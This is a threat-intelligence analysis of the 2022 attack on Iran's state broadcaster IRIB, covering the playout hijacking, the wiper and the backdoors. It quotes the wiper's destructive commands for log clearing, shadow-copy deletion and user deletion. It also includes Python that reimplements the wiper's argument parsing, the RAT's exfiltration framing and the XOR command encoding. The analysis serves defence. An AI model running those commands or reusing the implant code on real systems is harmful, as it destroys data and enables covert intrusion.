EvilPlayout: Attack Against Iran's State Broadcaster
February 18, 2022
In the past few months, a new wave of cyberattacks has been flooding Iran. These attacks are far from small-scale website defacements: the recent wave is hitting national infrastructure and causing major disruptions to public services.
This article provides an in-depth technical analysis of one of the attacks against the Iranian national media corporation, Islamic Republic of Iran Broadcasting (IRIB), which occurred in late January 2022.
Key findings
- On January 27, Iranian state broadcaster IRIB became the subject of a targeted cyberattack that resulted in several state-run TV channels broadcasting footage of opposition leaders and calling for the assassination of the supreme leader. The Check Point Research team investigated this attack and was able to retrieve the files and forensic evidence related to the incident from publicly available resources.
- We found malicious executables whose purpose was to air the protest message; in addition, we discovered evidence that a wiper malware was used. This indicates that the attackers' aim was also to disrupt the state's broadcasting networks, with the damage to the TV and radio networks possibly more serious than officially reported.
- Among the tools used in the attack, we identified malware that takes screenshots of the victims' screens, several custom-made backdoors, and related batch scripts and configuration files used to install and configure the malicious executables. We could not find any evidence that these tools were used previously, or attribute them to a specific threat actor.
- In this article, we provide a technical analysis of the tools related to the attack, as well as the attackers' tactics.
Background
Cyberattacks Hit Iran
In July 2021, an attack hit the Iranian national railway and cargo services, and caused "unprecedented disruptions" to the country's trains. Just a day after, media outlets reported that the website of Iran's Ministry of Roads and Urban Development, in charge of transportation, was taken down in a 'cyber disruption', preventing access to their official portal and sub-services. As if forcing railway employees to update the train schedule manually, across all train stations, wasn't enough, the message displayed on the train schedule boards referred perplexed passengers to the Supreme Leader's office phone number. The previously unknown group called 'Predatory Sparrow' quickly claimed responsibility for the attacks. Besides that, Check Point Research investigated these attacks and the tools they deployed, and found that similar tactics and techniques were used in previous operations against private companies in Syria, linking all of those attacks to an anti-regime group called Indra.
Since then, cyber-attacks continue to hit national Iranian entities. Inspecting the targets, it appears that each one was carefully selected to send a tailored message. In August 2021, the hacktivist group Tapandegan, previously known for hacking and displaying protest messages on the electronic flight arrival and departure boards in the Mashhad and Tabriz international airports in 2018, released security camera footage from the Evin prison, a Tehran facility in which many political prisoners are held. The videos, which show prisoner abuse, were acquired by a group called Edalat-e Ali ('Ali's Justice') in protest against human rights violations. In October 2021, every gas station in Iran was paralyzed by an attack that disrupted the electronic payment process. The incident led to extremely long queues at gas stations for two days and prevented customers from paying with the government-issued electronic cards used to buy subsidized fuel. When the card was swiped for payment, the Supreme Leader's office telephone number appeared on the screen, taunting the highest ranking office in the regime yet again. Iranian officials claimed that foreign actors, such as Israel and the United States, were behind the attack. However, Predatory Sparrow claimed responsibility for this attack too.
In November 2021, Iranian airline Mahan Air announced that it foiled an attempted attack against its internal systems, with no harm done. Curiously, this time a group called 'Hooshyaran-e Vatan' (Vigilants of the Nation) claimed responsibility, and over the next two months published documents allegedly stolen in the hack that link the airline to the IRGC (Islamic Revolutionary Guard Corps).
Recently, on February 7, 2022, the Edalat-e Ali group released footage from closed-circuit cameras in another Iranian prison, Ghezel Hesar.
Figure 1 – Timeline of latest cyberattacks in Iran.
The Voice and Vision of the Islamic Republic of Iran
On January 27, just two weeks before the anniversary of the 1979 Islamic Revolution, reports were published that the IRIB, Iran's national broadcaster, was hacked. The Islamic Republic of Iran Broadcasting, also called 'The Voice and Vision of the Islamic Republic of Iran', is a state-operated monopoly in charge of all radio and television services in Iran. The cyberattack resulted in state-run TV channels broadcasting what was described by IRIB officials as "the faces and voices of hypocrites."
'Hypocrites' is a term used by the Iranian regime to refer to the Mujahedin-e-Khalq (MEK, also called the People's Mujahedin of Iran), an exiled militant organization and the biggest political opposition group, which advocates overthrowing the current government and installing its own government, relying on an alternative interpretation of Islam. In the hijacked video, the faces of MEK leaders Maryam and Masoud Rajavi appeared, followed by the image of Ayatollah Khamenei crossed out with red lines and the declaration "Salute to Rajavi, death to (Supreme Leader) Khamenei!" The deputy head of technical affairs for IRIB, Reza Alidadi, stated that "only the owners of the technology in use by the corporation would have been able to carry out an attack relying on the system features installed on the systems and the exploited backdoor." He further stated that similar attacks have hit other state-operated radio channels.
Figure 2 – Frame from the video with the opposition leaders' faces broadcast by state-run Iranian TV channels as a result of the cyber attack.
Although not part of this investigation, it is worth mentioning that several days later, on February 1, the web-based streaming platform of IRIB, Telewebion, was hijacked yet again to broadcast protest messages urging citizens to rise up against the Supreme Leader and stating that "the regime's foundations are rattling". Cleverly, the incident took place in the middle of a live broadcast of the Iran-UAE soccer match. This time, the politically motivated group Edalat-e Ali, responsible for the attacks targeting prison facilities' security cameras, claimed responsibility. This claim is plausible, as the video broadcast during the hack features the group's logo in the top left corner.
IRIB attack artifacts
According to Iranian state-run news network Akharin Khabar (Latest News), "the technical and broadcasting systems are completely isolated, they are equipped with acceptable security protocols and are not accessible via the Internet." In the same post, it was reported that security forces associated with the government's state broadcasting network considered sabotage as the most likely scenario, with Iranian officials calling the attack "extremely complex."
It is still not clear how the attackers gained initial access to these networks. We were able to retrieve only the files related to the later stages of these attacks, responsible for:
- Establishing backdoors and their persistence.
- Launching the "malicious" video or audio track.
- Installing the wiper malware in an attempt to disrupt operations in the hacked networks.
All of these samples were uploaded to VirusTotal (VT) from multiple sources, mostly with Iranian IPs, and included short batch scripts that install or launch payloads, several forensic artifacts like Windows Event Log files or memory dumps, and the payloads themselves. The latter are mostly .NET executables, with no obfuscation but a timestamped compilation date in the future. In addition to having the same language and the same VT submitters, these files also share other similarities, such as PDB paths, common commands, names, code reuse, and general coding style.
Hijacking broadcast signals
From the MP4 video file that was used to interrupt the TV stream, and was uploaded to VT as TSE_90E11.mp4, we were able to pivot to other artifacts related to the broadcast hijacking, supposedly run on servers that broadcast TV programs (playouts). To play the video file, the attackers used a program called SimplePlayout.exe, a .NET-based executable compiled in debug mode with the PDB path c:\work\SimplePlayout\obj\Debug\SimplePlayout.pdb. This executable has a single functionality: to play a video file in a loop using the .NET MPlatform SDK by Medialooks.
Figure 3 – Part of the SimplePlayout code using MPlatform SDK to play the video file.
First, the SimplePlayout program looks for a configuration file called SimplePlayout.ini which contains two lines: the video file path, and a number representing the video format. The corresponding SimplePlayout.ini file uploaded together with SimplePlayout specifies the values that correspond to the MP4 file located at c:\windows\temp\TSE_90E11.mp4 and a video format of HD 1080i with a refresh rate of 50 Hz.
To kill the video stream already playing, the attackers used a batch script called playjfalcfgcdq.bat. It kills the running process and deletes the executable of TFI Arista Playout Server, a software which the IRIB is known to use for broadcasting, and subsequently uninstalls the Matrox DSX driver, a part of the software for media processing in virtualized broadcast infrastructures.
To combine all the malicious components, another script, layoutabcpxtveni.bat, does several things:
- Renames the MP4 video file located at c:\windows\temp\TSE_90E11.003 to TSE_90E11.mp4. This file was probably dropped there by one of the backdoors, which we discuss later.
- Kills the running process of QTV.CG.Server.exe, possibly a part of the Autocue QTV broadcasting software, and overwrites the original server located at D:\CG 1400\QTV.CG.Server.exe with SimplePlayout, the tool used by the attackers to play their video.
- Copies c:\windows\SimplePlayout.exe to SimplePlayout.ini in the same directory where QTV.CG.Server.exe resides. At least this sample of the batch script contains a typo, as the actors probably meant to copy SimplePlayout.ini next to the malicious executable.
- Runs SimplePlayout.exe from both the initial and replaced locations.
In another set of related artifacts that we discovered, the attackers use a WAV file containing a 25-second audio track titled TSE_90E11.001, similar to the file name of the MP4 file used in the hijacked TV stream. An executable called Avar.exe is based on NAudio, an open-source .NET audio library, and is responsible for playing the WAV file. Unlike SimplePlayout.exe, Avar.exe does not rely on a configuration file. Instead, it contains the path to the WAV file hardcoded as C:\windows\temp\TSE_90E11.001. After it executes, Avar.exe attempts to enumerate all active audio devices and play the WAV file on each one.
Finally, a batch script named avapweiguyyyw.bat puts the pieces together. It kills a process called ava.exe and replaces the executable at C:\Program Files\MIT\AVA\ava.exe with Avar.exe. The use of the name Ava in the files and folders might suggest that these files were intended for IRIB's AVA radio, although the fact that it was also impacted by this attack has not been confirmed officially.
The Wiper
We found two identical .NET samples named msdskint.exe whose main purpose is to wipe the computer's files, drives, and MBR. This can also be deduced from the PDB path: C:\work\wiper\Wiper\obj\Release\Wiper.pdb. In addition, the malware has the capability to clear Windows Event Logs, delete backups, kill processes, change users' passwords, and more. Both samples were uploaded to VT by the same submitters and in the same timeframe as the previously discussed artifacts.
Figure 4 – Overview of the wiper capabilities.
The wiper has three modes to corrupt the files, and fills the bytes with random values:
- default – Overwrite the first 200 bytes of each chunk of 1024 bytes in the file.
- light-wipe – Overwrite a number of chunks specified in the configuration.
- full_purge – Overwrite the entire file content.
The wiper gets its configuration for the wiping process in one of these ways: from command-line arguments, or from the hardcoded default configuration and exclude list in the file meciwipe.ini. The default configuration contains a pre-defined list of exclusions related to the Windows OS and the Kaspersky and Symantec security products, which are widely used in Iran:
"-light-wipe", "3", "-stop-iis", "-logs", "-shadows", "-processes", "*sql", "-mbr", "-fork-bomb", "-wipe-all", "-wipe-stage-2", "-wipe-exclude", "C:\\Windows", "-wipe-exclude", "C:\\$Recycle.Bin", "-wipe-exclude", "C:\\$WinREAgent", "-wipe-exclude", "C:\\Config.Msi", "-wipe-exclude", "C:\\Recovery", "-wipe-exclude", "C:\\Program Files\\IBM\\*", "-wipe-exclude", "C:\\System Volume Information", "-wipe-exclude", "C:\\Program Files\\Symantec*", "-wipe-exclude", "C:\\Program Files (x86)\\Symantec*", "-wipe-exclude", "C:\\Program Files\\Kaspersky*", "-wipe-exclude", "C:\\Program Files (x86)\\Kaspersky*", "-wipe-exclude", "C:\\Program Files\\Microsoft*", "-wipe-exclude", "C:\\Program Files (x86)\\Microsoft*", "-wipe-exclude", "C:\\Program Files\\Windows*", "-wipe-exclude", "C:\\Program Files (x86)\\Windows*"
If the malware has no arguments, it runs as a service named "Service1".
The main wiper function computes the FNV1A32 hash of every argument and uses that to determine the action:
Argument | Options | Action |
"-mbr" | – | Enable the DestroyMBR flag |
"-fork-bomb" | – | Start two more instances of the wiper, with the "-fork-bomb" argument as well |
"-sessions" | – | Kill other users' sessions with the cmd commands: logoff {0} and rwinsta {0} |
"-delete-users" | file_path or list of users (* = all users) | Delete the specified users using the cmd command: net user {0} /delete |
"-break-users" | file_path or list of users (* = all users) | Break the specified users by changing their password to an 8-byte random string with "aA1!" appended |
"-logs" | – | Delete events from the Windows Event Log using the cmd command: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" |
"-passwords" | – | None |
"-shadows" | – | Destroy shadow copies using the cmd command: echo delete shadows all > 1.s && diskshadow /s 1.s && del 1.s |
"-start-iis" | – | Start Internet Information Services (IIS) with iisreset /start |
"-stop-iis" | – | Stop Internet Information Services (IIS) with iisreset /stop |
"-config" | file_path | Read the arguments from the specified config file |
"-light-wipe" | size | Corrupt only the specified number of 1024-byte chunks in a file |
"-wipe-exclude" | list of directories | Add directories that the wiper won't wipe |
"-delete" | – | Enable the delete_files flag, which means deleting the files after their corruption |
"-processes" | file_path or list of processes (* = all processes) | Kill the specified processes using the cmd command: taskkill /PID {0} /f |
"-wipe-stage-2" | – | Enable the wipe_stage_2 flag, which means wiping the files by the default method and then deleting them |
"-purge" | – | Enable the full_purge flag, which means corrupting the whole file and not only chunks |
"-wipe-only" | file_path or list of files | Add a list of files to wipe |
"-wipe-all" | – | Wipe all the files with supported extensions |
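Hashing each argument with FNV-1a and switching on the hash means the binary carries no plaintext switch names, so an analyst recovering the table has to hash candidate strings and match them against the constants in the code. The following is an added example, not the wiper's source: it implements standard 32-bit FNV-1a, rebuilds a hash-to-switch table for the switches documented above, walks an argument list the way a hash-dispatching parser would (recording actions instead of performing them), and includes the small brute-force helper an analyst would use against an unknown hash. That the wiper hashes the UTF-8 bytes of each argument, and the exact handling of "-config" (recorded here, not recursed into), are assumptions.

```python
FNV_OFFSET_32 = 0x811C9DC5
FNV_PRIME_32 = 0x01000193


def fnv1a32(s: str) -> int:
    """Standard 32-bit FNV-1a over the UTF-8 bytes of s (encoding is an assumption)."""
    h = FNV_OFFSET_32
    for b in s.encode("utf-8"):
        h ^= b
        h = (h * FNV_PRIME_32) & 0xFFFFFFFF
    return h


# Switches from the table above; the value says whether the switch consumes the next token.
SWITCHES = {
    "-mbr": False, "-fork-bomb": False, "-sessions": False, "-logs": False,
    "-passwords": False, "-shadows": False, "-start-iis": False, "-stop-iis": False,
    "-delete": False, "-wipe-stage-2": False, "-purge": False, "-wipe-all": False,
    "-delete-users": True, "-break-users": True, "-config": True, "-light-wipe": True,
    "-wipe-exclude": True, "-processes": True, "-wipe-only": True,
}

# What a hash-dispatching binary carries: hash -> handler, no plaintext names.
HASH_TABLE = {fnv1a32(name): name for name in SWITCHES}


def parse_args(argv):
    """Walk argv by hashing each token and looking it up; nothing is executed.

    Returns (actions, unknown): actions maps a switch to True (flag) or to the
    list of operands it was given; repeated switches such as -wipe-exclude
    accumulate. "-config" is recorded, not followed (assumption).
    """
    actions, unknown, i = {}, [], 0
    while i < len(argv):
        name = HASH_TABLE.get(fnv1a32(argv[i]))
        if name is None:
            unknown.append(argv[i])
            i += 1
        elif SWITCHES[name]:
            operand = argv[i + 1] if i + 1 < len(argv) else None
            actions.setdefault(name, []).append(operand)
            i += 2
        else:
            actions[name] = True
            i += 1
    return actions, unknown


def recover_switch(target_hash: int, candidates):
    """Analyst helper: match a hash constant lifted from the binary against a wordlist."""
    for c in candidates:
        if fnv1a32(c) == target_hash:
            return c
    return None


# The wiper's hardcoded default configuration, transcribed from the analysis above.
DEFAULT_CONFIG = [
    "-light-wipe", "3", "-stop-iis", "-logs", "-shadows", "-processes", "*sql",
    "-mbr", "-fork-bomb", "-wipe-all", "-wipe-stage-2",
    "-wipe-exclude", r"C:\Windows",
    "-wipe-exclude", r"C:\$Recycle.Bin",
    "-wipe-exclude", r"C:\$WinREAgent",
    "-wipe-exclude", r"C:\Config.Msi",
    "-wipe-exclude", r"C:\Recovery",
    "-wipe-exclude", r"C:\Program Files\IBM\*",
    "-wipe-exclude", r"C:\System Volume Information",
    "-wipe-exclude", r"C:\Program Files\Symantec*",
    "-wipe-exclude", r"C:\Program Files (x86)\Symantec*",
    "-wipe-exclude", r"C:\Program Files\Kaspersky*",
    "-wipe-exclude", r"C:\Program Files (x86)\Kaspersky*",
    "-wipe-exclude", r"C:\Program Files\Microsoft*",
    "-wipe-exclude", r"C:\Program Files (x86)\Microsoft*",
    "-wipe-exclude", r"C:\Program Files\Windows*",
    "-wipe-exclude", r"C:\Program Files (x86)\Windows*",
]

if __name__ == "__main__":
    for name in SWITCHES:
        print(f"{fnv1a32(name):08x}  {name}")
    acts, unk = parse_args(DEFAULT_CONFIG)
    print(sorted(acts), unk)
```

Printing the table once gives the constants to search for in the disassembly; conversely, any unexplained 32-bit immediate compared against the argument hash can be fed to recover_switch with a wordlist of plausible switch names.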
The DestroyMBR flag enables the malware to wipe the MBR by writing a hardcoded base64-encoded binary to the file precg.exe and then running it. precg.exe is an MBRKiller based on the Gh0stRAT MBR wiper.
The main wiping procedure starts by searching for the last file that was wiped. The malware writes its path to the file named lastfile (or lastfile2 in the case of wipe_stage_2). Then, every file is checked to see if it is excluded or if its extension is not in the predefined list:
".accdb", ".cdx", ".dmp", ".h", ".js", ".pnf", ".rom", ".tif", ".wmdb", ".acl", ".cfg", ".md", ".hlp", ".json", ".png", ".rpt", ".tiff", ".wmv", ".acm", ".chk", ".docx", ".hpi", ".lnk", ".pps", ".rsp", ".tlb", ".xdr", ".amr", ".com", ".dot", ".htm", ".log", ".ppt", ".sam", ".tmp", ".xls", ".apln", ".cpl", ".drv", ".html", ".lst", ".pptx", ".scp", ".tsp", ".xlsx", ".asp", ".cpx", ".dwg", ".hxx", ".m4a", ".pro", ".scr", ".txt", ".xml", ".avi", ".dat", ".eml", ".ico", ".mid", ".psd", ".sdb", ".vbs", ".xsd", ".ax", ".db", ".exe", ".inc", ".nls", ".rar", ".sig", ".wab", ".nix", ".bak", ".dbf", ".ext", ".ini", ".one", ".rar", ".sql", ".wab~", ".bin", ".dbx", ".fdb", ".jar", ".pdf", ".rdf", ".sqlite", ".wav", ".bmp", ".dll", ".gif", ".jpg", ".pip", ".resources", ".theme", ".wma", ".config", ".mxf", ".mp3", ".mp4", ".cs", ".vb", ".tib", ".aspx", ".pem", ".crt", ".msg", ".mail", ".enc", ".msi", ".cab", ".plb", ".plt"
The full_purge mode, which overwrites all the bytes of the file, is always enabled for the files from the purge_extensions list:
".json", ".htm", ".log", ".html", ".lst", ".txt", ".xml", ".vbs", ".inc", ".ini", ".sql"
If the delete_files flag is enabled, the wiper also deletes the files after overwriting them.
We found additional forensic artifacts, submitted together with the wiper samples, that prove that the wiper was indeed executed in a TV environment:
- The lastfile2 file containing the path to the last wiped file: C:\users\tpa\videos\captures\desktop.ini. This file is created only if the wiper was run in wipe_stage_2 mode, which deletes the files after the wiping procedure.
- The breakusufjkjdil.bat file, which shows that at least one instance of the wiper was supposed to run with the intent to kill existing user sessions and change the passwords of all users: "c:\windows\temp\msdskint.exe" -break-users * -sessions
- The Event Viewer Application log file, which shows events related to the wiper service Service1. The logs contain a timestamp which is a few hours after the attack:
Figure 5 – Windows Event Viewer logs showing the wiper execution in the Iranian TV environment.
Backdoors
WinScreeny
The name of this tool comes from the PDB path: C:\work\winscreeny\winscreeny\obj\Debug\winscreeny.pdb. The main purpose of the backdoor is to take screenshots of the victim's computer. We found two samples of this backdoor: the first one is the release version uploaded to VT with the name mslicval.exe, and the second one is the debug version named precg2.exe. Needless to say, these files were submitted to VT together with the other artifacts that we discovered.
The backdoor can be run in different ways, based on the command-line argument:
- None – Runs a SimpleTCPServer that listens on port 18000.
- service – Runs as a service named Service1. At start, the service creates a scheduled task with the command: schtasks /create /TN "Microsoft\Windows\.NET Framework\.NETASM" /TR "<file_path>" /ST <current_time + 1:10> /SC ONCE /F
- setup – Tries to gain privileges using the LsaAddAccountRights API function and then runs itself as a service.
The malware listens for packets on port 18000, and for each packet, it checks if the message contains the scr= command sent with the POST method. If these conditions are met, the malware saves a screenshot to a file named screeny-<timestamp>.png and a "done" message is returned to the attacker if it succeeded.
Figure 6 – Winscreeny screenshot capture code.
Interestingly, the release version of this malware is also capable of command execution: it supports the s= command, which gets a base64-encoded string XORed with the 1-byte key 0x24. The decoded string is run by cmd and the execution result is returned to the server. The code that handles this feature is also reused in the HttpService backdoor that we discuss later.
HttpCallbackService
HttpCallbackService is a Remote Administration Tool (RAT) with a familiar PDB path: C:\work\simpleserver\HttpCallbackService\obj\Release\HttpCallbackService.pdb. Its C&C URL can be specified in two different ways: a command-line argument or the configuration file callservice.ini. Next, the received value is appended with a short string: ?m= if the URL ends with ".aspx" or ".php"; m= if the URL ends with "/"; or /m= in any other case.
Unfortunately, we didn't find any configuration or other artifacts related to HttpCallbackService, so the C&C server in this attack remains unknown.
Every 5 seconds, HttpCallbackService sends a request to the C&C URL using the webClient.DownloadString method to receive the list of commands, split by '\r\n'. If the malware doesn't receive any commands in the last 5 minutes and the isStayAliveMode flag is disabled, this time frame is increased to 1 minute.
These are the commands supported by the RAT:
Command | Arguments | Action |
"upload" | upload_path, base64-encoded content | Upload a file to the victim's computer. The server may send the file in chunks, each of them sequentially decoded from base64 and appended to the file |
"download" | file name | Download a file from the victim's computer to the C&C server; the file is base64-encoded and sent in chunks of 102400 bytes |
"stay-alive" | – | Enable the isStayAliveMode flag and change the timer to 5 seconds |
"cool-down" | – | Disable the isStayAliveMode flag |
Default | command string | Run the command in cmd and return the result to the C&C server |
When the results of the commands are uploaded to the server, the data is sent to a slightly different URL: the C&C URL defined previously, now appended with "1". The data is sent using the WebClient.UploadValues method in the following format:
- download=<file_name>\r\n--------------\r\n<base64 of chunk> for the download command
- <command>\r\n--------------\r\n<result> for the cmd command.
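A defender who wants to drive a captured sample in a sandbox, or to write a parser for proxy logs of this beaconing, needs the framing rules above in executable form. The following is an added example written for this article, not the RAT's code: it implements the URL suffix rule, the CRLF command list, the result frame with its 14-dash separator, and the chunked base64 file download with the matching server-side reassembly. The C&C host in the usage lines is a documentation address, not an indicator from this attack; that the 102400-byte chunk size applies to the raw file bytes before base64 is an assumption.

```python
import base64

SEPARATOR = "\r\n--------------\r\n"   # the separator line shown in the format above
CHUNK_SIZE = 102400                     # download chunk size, per the analysis


def beacon_url(cnc: str) -> str:
    """Apply the suffix rule HttpCallbackService uses on its configured C&C URL."""
    if cnc.endswith((".aspx", ".php")):
        return cnc + "?m="
    if cnc.endswith("/"):
        return cnc + "m="
    return cnc + "/m="


def result_url(cnc: str) -> str:
    """Results are posted to the beacon URL with "1" appended."""
    return beacon_url(cnc) + "1"


def split_commands(body: str):
    """The poll response is a CRLF-separated command list; empty lines are dropped."""
    return [line for line in body.split("\r\n") if line]


def frame_cmd_result(command: str, result: str) -> str:
    """Implant side: <command>\\r\\n--------------\\r\\n<result>."""
    return f"{command}{SEPARATOR}{result}"


def frame_download_chunks(file_name: str, data: bytes):
    """Implant side: one upload body per chunk of raw file bytes, base64-encoded."""
    for off in range(0, len(data), CHUNK_SIZE):
        chunk = base64.b64encode(data[off:off + CHUNK_SIZE]).decode("ascii")
        yield f"download={file_name}{SEPARATOR}{chunk}"


def parse_frame(body: str):
    """Server side: split an uploaded frame at the first separator.

    Returns ("download", file_name, raw_bytes) or ("cmd", command, result_text).
    """
    head, sep, payload = body.partition(SEPARATOR)
    if not sep:
        raise ValueError("missing separator")
    if head.startswith("download="):
        return ("download", head[len("download="):], base64.b64decode(payload))
    return ("cmd", head, payload)


def reassemble_download(frames):
    """Server side: concatenate decoded chunks of one file, in arrival order."""
    name, parts = None, []
    for body in frames:
        kind, fname, data = parse_frame(body)
        if kind != "download" or (name is not None and fname != name):
            raise ValueError("mixed or non-download frames")
        name = fname
        parts.append(data)
    return name, b"".join(parts)


if __name__ == "__main__":
    cnc = "http://203.0.113.5/cb.aspx"        # documentation address, not an IOC
    print(beacon_url(cnc), result_url(cnc))
    for c in split_commands("whoami\r\nstay-alive\r\n"):
        print("command:", c)
    print(parse_frame(frame_cmd_result("whoami", "host\\user")))
```

Because the implant sends no sequence numbers, the server has to rely on arrival order when joining chunks; a proxy log that shows a burst of POSTs to a URL ending in "m=1", each roughly 136 KB (102400 bytes after base64 expansion), is the visible trace of a file being exfiltrated this way.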
HttpService
HttpService is another backdoor that listens on a specified port: it can be a command-line argument, the pre-defined port depending on the sample, or the value from the configuration file <exe_name>.ini. We found several samples with the default ports 19336, 19334 and 19333, as well as two different configuration files uploaded to VT, with the values 19336 and 19335.
Each sample has a hardcoded version. The files that we discovered belong to three different versions: 0.0.5, 0.0.11v4H and 0.0.15v4H. Version 0.0.5 listens on the specified port with a Simple TCP server, whereas 0.0.11v4H and 0.0.15v4H are based on the Simple HTTP Server. All of them use the HTML Agility Pack for HTML parsing and the IonicZip library for compression actions.
The highest version (0.0.15v4H) of the backdoor has multiple capabilities, including command execution and manipulation of files.
Command execution: The command "cmd" makes the backdoor run the specified command with cmd.exe and return the result in this format: <div style='color: red'><result_string></div>. In addition, the backdoor can launch an interactive cmd shell when it receives the "i=" command, whose arguments can be:
- "1" – Get the output from the shell and send it back to the C&C.
- "2" – End the interactive shell and clean up.
- default – Decode and decrypt the XORed string, then run the command in the shell and save the output.
Similar to WinScreeny, the malware also has the "s=" command, with the string XORed with the 1-byte key 0x24 as an argument. The decoded string is run by cmd.exe and the result is returned to the server.
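The s= encoding shared by WinScreeny and HttpService is weak enough to be undone without the binary: base64 is reversible and a single-byte XOR key can be brute-forced from any captured request. The following is an added example written for this article, covering the s= command of both backdoors, and not the code of either: it implements the operator-side encoder, the implant-side decoder, a key-recovery routine that scores all 256 keys by how much the output looks like a cmd command line, and a parser that pulls s= values out of a form-encoded POST body. The order of operations (XOR first, then base64, so the implant base64-decodes and then XORs, as the "decode and decrypt" wording suggests) and the form-encoding of the body are assumptions; all inputs are constructed.

```python
import base64
from urllib.parse import parse_qs, quote

KEY = 0x24   # the single-byte key named in the analysis
SHELL_ALPHABET = b"abcdefghijklmnopqrstuvwxyz "   # what a cmd line mostly consists of


def encode_s(command: str, key: int = KEY) -> str:
    """Operator side: XOR every byte with the key, then base64 (order is an assumption)."""
    xored = bytes(b ^ key for b in command.encode("utf-8"))
    return base64.b64encode(xored).decode("ascii")


def decode_s(value: str, key: int = KEY) -> str:
    """Implant side: base64-decode, then XOR with the key to recover the command line."""
    raw = base64.b64decode(value)
    return bytes(b ^ key for b in raw).decode("utf-8", errors="replace")


def recover_key(value: str):
    """Analyst helper for when the key is unknown.

    Tries all 256 single-byte keys and keeps the one whose output contains the
    most lowercase letters and spaces. Only the true key maps spaces back to
    spaces, so any command line with a few spaces pins the key unambiguously.
    Returns (key, plaintext).
    """
    raw = base64.b64decode(value)

    def score(k: int) -> int:
        return sum(1 for b in raw if (b ^ k) in SHELL_ALPHABET)

    best = max(range(256), key=score)
    return best, bytes(b ^ best for b in raw).decode("utf-8", errors="replace")


def decode_body(body: str):
    """Decode every s= value found in an x-www-form-urlencoded request body.

    parse_qs percent-decodes the value, so a body built with quote() round-trips
    even when the base64 contains '+', '/' or '='.
    """
    params = parse_qs(body, keep_blank_values=True)
    return [decode_s(v) for v in params.get("s", [])]


# Constructed sample of such a request body on the wire (not captured traffic).
SAMPLE_BODY = "s=" + quote(encode_s("cmd.exe /c whoami /all && ipconfig /all"), safe="")

if __name__ == "__main__":
    print(encode_s("whoami"))                 # U0xLRUlN
    print(decode_body(SAMPLE_BODY))
    key, plain = recover_key(encode_s("net user", key=0x5A))
    print(hex(key), plain)
```

Note that XOR with 0x24 keeps ASCII letters inside the printable range, so the XORed text still base64-encodes to something that looks like ordinary base64 of text; the key is not hiding the command from anyone who bothers to decode the parameter, only from string scanners that look for plaintext commands in traffic.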
Proxy connections: After the "p=" or "b=" command is received, the backdoor uses the victim's computer as a proxy to the URL it gets as an argument. The backdoor communicates with this URL, forwards the request of the C&C server, and waits for a response to send back to the C&C.
Download and upload files: The "f=" or "1=" command allows the backdoor to download a file from the path given as an argument, or to write a file given as an argument with the content of the message body. After it receives the "k=" command, the malware writes the body of the message to the path <base_directory><client_address>.out, reads data from <base_directory><client_address>.in, and sends it to the C&C. If the file does not exist, the malware creates the file and writes the current date and time to it.
Run SQL commands: The "con=" / "c=" command receives a SQL DB connection string and a SQL query, and returns the result to the server.
Manipulate the local files: The "<path>" command checks if the file/directory exists and then does one of these three things, based on the query value:
- "zip" – Creates a zip file from the directory contents and returns it to the C&C.
- "unzip" – Unzips the file using the path provided by the C&C.
- "del" – Deletes the file.
Interestingly, in all three cases, the malware sends back the entire directory contents (including sub-directories) as an HTML page that contains Zip, Unzip and Delete buttons, depending on the type of the file. This is how the interface looks on the attackers' side:
Figure 7 – HTML page with the directory list returned to the C&C server.
ServerLaunch dropper
The sample of HttpService version 0.0.5 was submitted together with its dropper, called dwDrvInst.exe, which mimics the remote access software executable by DameWare. The tool's PDB path has the same pattern, C:\work\ServerLaunch\Release\ServerLaunch.pdb. However, the tool is written in C++, not .NET like all the others, and was compiled on December 2, 2021, almost 2 months prior to the attack.
ServerLaunch contains three executables in its resources, which it drops to ionic.zip.dll, httpservice2 and httpservice4, all in C:\Users\Public\. The malware then starts both httpservice2 and httpservice4 with no arguments. Each of them has a different pre-defined port to listen on, which likely allows the attackers to ensure some sort of redundancy for the C&C communication.
Connecting the files to the attack
We've discussed several different tools and some of the artifacts related to their execution. It is clear that all these tools were created by the same actor and are connected. For example, the screenshot tool Winscreeny doesn't contain the functionality to upload the created screenshots back to the attackers, which likely means that it relies on other backdoors to perform this operation. The recurring Service1 name for all the tools indicates that different backdoors, if running on the same machine, were mostly executed with command-line arguments or provided configuration files.
Taking into account that the samples are related to each other, we can substantiate the connection between these files and the IRIB cyberattack:
- The whole cluster of activity is interconnected and was submitted to VT mostly from Iranian IPs, all in the same timeframe, likely by incident responders.
- The audio and video files utilized by the tools are the same as those broadcast live on hacked Iranian TV. The Twitter account @GhyamSarnegouni ("Uprising to overthrow") featured in this video contains a few recordings of different TV channels' streams that feature both the video and the audio tracks we've discussed.
- Multiple artifacts such as Matrox DSX, Autocue QTV, TFI Arista Playout Server, etc. that were referenced in the samples indicate that these files were intended for a broadcast environment.
- Among the forensic artifacts submitted together with the video and executables, we discovered Windows Event Viewer files that contain evidence that the samples were attempted to be executed in the Iranian TV network environment, a domain not resolved publicly. The timestamp of these specific logs is after the time of the actual incident.
Figure 8 – Screenshot of the Application log that contains the wiper execution evidence.
- Numerous other pieces of forensic evidence from this VT file cluster contain artifacts directly related to IRIB. For example, an internal tool called MIT_FreeSizeService (md5: 307e7440a15c8eed720566f067a2e96b) bears the IRIB logo, and the memory dump of the MetaSAN software called executable.4504.exe (md5: 1fc57ccec4668bbcbebaa9c734a437ba) features memory strings that indicate the software was run on a machine from the MIT-TV domain.
Figure 9 – VT submission of the unknown tool featuring the MIT string (same as the domain name) and containing the IRIB logo.
Attribution
Iranian officials appear to be confident that MEK is behind this attack, with the deputy head of technical affairs for Islamic Republic of Iran Broadcasting claiming the same. However, the opposition group itself denies any involvement, stating that "the group had become aware of the incident only when it happened but that the hacking might have been the work of supporters in Iran."
The hacktivist group Predatory Sparrow, which claimed responsibility for the attacks against the national railway services, the transportation ministry, and the Iranian gas stations, affiliated itself with the IRIB attack via its Telegram channel. On the morning before the attack, they wrote "Wait for the good news from our team. Do not switch the channel." Later the same evening, they posted a video from one of the disrupted TV channels, introducing it as a "cyber-attack on the country's radio and television system by the Predatory Sparrow team." Currently, no technical proof of the group's attribution to the attack has been discovered. The video displayed on the channel is available online and refers to a different Telegram account, @GhyamSarnegouni, so the claims should be treated with caution.
Figure 10 – Posts from Predatory Sparrow's Telegram channel, in which the group claims responsibility for the attack.
Conclusion
